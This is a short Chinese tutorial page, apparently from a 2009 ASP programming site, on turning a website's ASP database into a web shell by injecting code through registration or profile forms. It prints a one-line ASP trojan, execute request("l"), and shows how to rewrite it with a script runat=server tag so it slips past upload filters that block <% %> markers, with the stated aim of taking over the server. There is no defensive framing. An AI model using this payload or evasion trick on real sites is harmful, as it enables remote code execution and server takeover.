当前位置: 首页 > 图文教程 > 网络编程 > ASP > 插入ASP代码让网站数据库成为ASP木马

ASP
ASP 3.0高级编程(十一)
ASP 3.0高级编程(十三)
ASP 3.0高级编程(十四)
ASP 3.0高级编程(十五)
ASP 3.0高级编程(十六)
ASP 3.0高级编程(十七)
ASP 3.0高级编程(十八)
ASP 3.0高级编程(十九)
ASP 3.0高级编程(二十)
ASP 3.0高级编程(二十一)
ASP 3.0高级编程(二十二)
ASP 3.0高级编程(二十三)
ASP+配置 — ASP+配置概念(二)
ASP+配置 — ASP+配置概念(三)
ASP+全新接触(1)
ASP+全新接触(2)
ASP+全新接触(3)
ASP+全新接触(4)
asp+语法教程(一)前言
asp+语法教程(二)书写我们的第一个asp+文件

插入ASP代码让网站数据库成为ASP木马


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-08-14   浏览: 146 ::
收藏到网摘: n/a

很多时候我们可以通过在注册表单或者用户信息修改表单中,插入简短的ASP代码,使网站ASP数据库变成为一个ASP木马,然后进一步入侵控制服务器。

不过在上传代码过程中,许多网页程序都不允许包含〈%%〉标记符号的内容的文件上传。

这样就有好多SHELL不能上传上去了。可以采用下面的方法解决。以蓝屏最小ASP木马为例。

首先:原程序代码是:

〈%execute request("l")%〉

我们可以把它的标签换下来。

然后改成:

<scriptlanguage=VBScript runat=server>execute request("l")</Script>

这样就避开了使用〈%%〉,保存为.ASP,程序同样执行。